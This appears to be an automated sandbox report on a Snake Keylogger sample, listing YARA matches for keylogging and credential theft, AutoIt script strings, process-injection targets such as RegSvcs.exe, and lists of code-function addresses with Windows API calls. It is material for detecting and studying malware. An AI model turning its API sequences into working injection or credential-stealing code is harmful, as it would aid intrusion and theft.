              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: PsBygexGwH.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: PsBygexGwH.exe, 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6544cbe5-d
              Source: PsBygexGwH.exe, 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b7a97d05-4
              Source: PsBygexGwH.exe, 00000000.00000003.2959475074.0000000004101000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce91a3ca-8
              Source: PsBygexGwH.exe, 00000000.00000003.2959475074.0000000004101000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c94f0853-9
              Source: name.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: name.exe, 00000006.00000002.2999789475.0000000000382000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1a9718ee-0
              Source: name.exe, 00000006.00000002.2999789475.0000000000382000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4538d9ec-a
              Source: name.exe, 00000009.00000000.3104924286.0000000000382000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4b00458a-0
              Source: name.exe, 00000009.00000000.3104924286.0000000000382000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0f2108f5-4
              Source: PsBygexGwH.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f24d0a11-c
              Source: PsBygexGwH.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_99a18de8-d
              Source: name.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_63133954-6
              Source: name.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d1731f20-b
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0018D5EB
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00181201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00181201
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0018E8F6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_0032E8F6
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001920460_2_00192046
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001280600_2_00128060
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001882980_2_00188298
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0015E4FF0_2_0015E4FF
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0015676B0_2_0015676B
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001B48730_2_001B4873
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0014CAA00_2_0014CAA0
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0012CAF00_2_0012CAF0
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0013CC390_2_0013CC39
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00156DD90_2_00156DD9
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0013B1190_2_0013B119
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001291C00_2_001291C0
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001413940_2_00141394
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001417060_2_00141706
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0014781B0_2_0014781B
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001279200_2_00127920
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0013997D0_2_0013997D
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001419B00_2_001419B0
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00147A4A0_2_00147A4A
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00141C770_2_00141C77
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00147CA70_2_00147CA7
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001ABE440_2_001ABE44
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00159EEE0_2_00159EEE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00141F320_2_00141F32
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_023C37C00_2_023C37C0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002C80606_2_002C8060
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003320466_2_00332046
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003282986_2_00328298
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002FE4FF6_2_002FE4FF
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002F676B6_2_002F676B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003548736_2_00354873
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002ECAA06_2_002ECAA0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002CCAF06_2_002CCAF0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002DCC396_2_002DCC39
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002F6DD96_2_002F6DD9
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002DD0656_2_002DD065
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002C90BC6_2_002C90BC
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002DB1196_2_002DB119
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002C91C06_2_002C91C0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E13946_2_002E1394
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E17066_2_002E1706
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E781B6_2_002E781B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002C79206_2_002C7920
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002D997D6_2_002D997D
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E19B06_2_002E19B0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E7A4A6_2_002E7A4A
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E1C776_2_002E1C77
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E7CA76_2_002E7CA7
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00313CD56_2_00313CD5
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0034BE446_2_0034BE44
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002F9EEE6_2_002F9EEE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E1F326_2_002E1F32
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002CBF406_2_002CBF40
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_039037C06_2_039037C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EC1F07_2_008EC1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E61687_2_008E6168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EB3887_2_008EB388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EC4D07_2_008EC4D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EC7B27_2_008EC7B2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E98B87_2_008E98B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E68E07_2_008E68E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008ECA927_2_008ECA92
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EFA107_2_008EFA10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E4B317_2_008E4B31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EBC327_2_008EBC32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EEDF07_2_008EEDF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EBF107_2_008EBF10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EE3007_2_008EE300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EE3107_2_008EE310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008E35CA7_2_008E35CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EB5527_2_008EB552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F736887_2_04F73688
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7C8B87_2_04F7C8B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F782787_2_04F78278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F77BA87_2_04F77BA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F704A07_2_04F704A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F704907_2_04F70490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7C4607_2_04F7C460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7C4507_2_04F7C450
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7F4287_2_04F7F428
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7F4187_2_04F7F418
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7D5C07_2_04F7D5C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7D5B07_2_04F7D5B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F70D607_2_04F70D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F70D507_2_04F70D50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7CD107_2_04F7CD10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7CD027_2_04F7CD02
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7DE707_2_04F7DE70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F736787_2_04F73678
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7DE617_2_04F7DE61
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7BFF87_2_04F7BFF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7EFD07_2_04F7EFD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7EFC17_2_04F7EFC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7B7587_2_04F7B758
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7B7487_2_04F7B748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7E7207_2_04F7E720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7E7107_2_04F7E710
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F708F17_2_04F708F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7C8A87_2_04F7C8A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7F8807_2_04F7F880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7F8717_2_04F7F871
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F700407_2_04F70040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7001F7_2_04F7001F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7C0087_2_04F7C008
